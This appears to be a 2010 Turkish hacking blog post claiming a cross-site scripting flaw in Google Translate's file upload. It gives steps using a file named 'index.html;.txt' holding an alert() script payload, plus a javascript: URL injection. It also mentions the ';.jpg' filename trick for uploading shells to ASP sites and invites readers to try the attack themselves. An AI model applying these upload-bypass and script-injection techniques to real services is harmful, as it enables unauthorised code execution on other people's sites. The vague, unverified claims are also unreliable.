19 Haziran 2010 Cumartesi

Google Translate XSS Vulnerabilities



Googlede çeviri yaparken dikkatimi çekti büyük makele dosya v.s gibi yazıları çevirmek için google translate upload hizmeti eklemiş biraz peşinden gittim bir iki yaptıgım denemeler testler sonucunda upload bölümünden yüklenen dosyalarda kod çalıştırıldıgını fark ettim windows v.b türdeki sunucularda ;.jpg yontemi ile shell sokuyorduk  Asp Script Upload Olan Sitelerden jpg uzantılı FSO Shell Yedirme bu konudan bakabilirsiniz aynı yontemi googlede uyguladım ve sorunsuz bir şekilde çalıştı hem Html hemde java kod çalışıyor..


ALTTA XSS CODE YAZAN KISIMDAKİ BOSLUKLARI KALDIRIP SİZDE DENİYEBİLİRSİNİZ %99 ÇALIŞIYOR



# Google Translate  XSS Vulnerabilities
# Date  : 20 06 2010
# Author: ByEge
# Homepage: byege.blogspot.com
# Home  : http://translate.google.com/

# Go Site : http://translate.google.com/
# Explorer Url delete and java code inj..
# Java Code: javascript:ctr._select_document();javascript:_rollup()
# And Xss code index.html;.txt saved
# Xss code : < script > alert ( 'tested ByEge byege.blogspot.com' )  < / script >
# # index.html;.txt upload translate
# Xss mod : On

Hiç yorum yok :

Yorum Gönderme